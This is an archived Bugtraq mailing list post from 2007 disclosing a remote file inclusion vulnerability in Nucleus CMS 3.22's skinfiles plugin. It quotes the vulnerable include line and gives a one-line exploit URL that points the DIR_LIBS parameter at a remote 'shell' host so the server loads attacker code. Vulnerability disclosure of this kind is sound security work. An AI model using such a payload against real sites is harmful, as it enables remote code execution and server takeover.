Bugtraq mailing list archives

nucleus 3.22 >> RFI


From: alijsb () yahoo com
Date: 25 Apr 2007 18:54:20 -0000

VENDOR :http://nucleuscms.org/
BY : s3rv3r_hack3r (hackerz.ir admin)
bug:
nucleus3.22/nucleus/plugins/skinfiles/index.php = include($DIR_LIBS . 'PLUGINADMIN.php');
Exloit: 
http://victim/nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://shell


Current thread: